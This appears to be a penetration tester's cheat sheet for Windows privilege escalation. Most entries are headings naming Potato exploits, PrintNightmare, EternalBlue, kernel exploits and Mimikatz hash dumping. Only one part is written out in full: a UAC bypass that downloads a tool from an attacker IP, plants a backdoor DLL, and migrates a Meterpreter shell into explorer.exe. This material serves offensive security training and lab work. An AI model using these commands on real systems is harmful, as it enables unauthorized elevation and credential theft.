PrivilageEsc Windows π
01. Common Tricks
01.1 UAC Bypass
DLL Hijacking UAC Bypass. (SystemPropertiesAdvanced.exe) Click here for more!
## Source : https://egre55.github.io/system-properties-uac-bypass/
## ------------------| Check if we are vuln?
IWR http://10.10.14.38/sigcheck64.exe -outfile sigcheck.exe
.\sigcheck.exe -accepteula -m C:\Windows\SysWOW64\SystemPropertiesAdvanced.exe | findstr autoElevate
## If is true; we are good to go!!
## ------------------| Create backdoor dll file
https://docs.h4rithd.com/tools/shells-payloads#09.-dll-hijack
## ------------------| Exploit
copy srrstr.dll C:\Users\<USER>\appdata\local\microsoft\windowsapps\srrstr.dll
cmd /c C:\Windows\SysWow64\SystemPropertiesAdvanced.exe
### If you get any error saying "This operation requires an interactive window".
### You should use any kind of C2 (Use GreatSCT/MSBuild to launch Meterpreter)
## ------------------| Use with interactive shell
### Create payload and gain shell using following methord
### https://docs.h4rithd.com/tools/shells-payloads#10.-greatsct
### migrate the process to explorer.exe
meterpreter > ps -S explorer
meterpreter > migrate <PID>
meterpreter > shell
cmd /c C:\Windows\SysWow64\SystemPropertiesAdvanced.exe01.2 If you have, in or can?
AlwaysInstallElevatedcheck
SeBackupPrivilegeandSeRestorePrivilegehas?
If you has
SeLoadDriverPrivilege?
If the user is in
DnsAdminsgroup?
If you have
GenericAllon user jorden
If you have
GenericWriteon any services
If you have
xp_dirtree?
If you are on
Azure Adminsgroup?
If you are in member of
Event Log Readersgroup.
If you are on
WSUS Administratorsgroup? SharpWSUS
If you are member of
Administratorsgroup, but still stuck?
If you are in
LAPS_Readers
Hijacking/Migrating login sessions.
01.3 Service / Registry Exploits
Insecure Service Executables
Weak Registry Permissions
02. Tools
02.1 PowerUp
02.3 Seatbelt
02.4 SecretsDump
03. Common Exploits
03.0 JuicyPotatoNG (New)
03.1 Juicy Potato (Abusing the golden privileges)
Click here to view CLSIDs
03.3 MultiPotato
03.4 PrintSpoofer
03.7 Serviio Insecure File Permissions
03.8 PrintNightmare
03.9 EternalBlue (MS17-010)
03.11 Windows Kernel Exploits
**Download all the Binary Files from : **https://github.com/SecWiki/windows-kernel-exploits
Microsoft Windows - Local Privilege Escalation (MS15-051)
USBPcap Null Pointer Dereference Privilege Escalation (CVE-2017-6178)
USBPcap Null Pointer Dereference Privilege Escalation (CVE-2017-6178)04. Mimikatz
More command available at here!
Dump all user's
ntlmhashes usinglsass
Set password for account
Decrypt EFS files. [source]
Last updated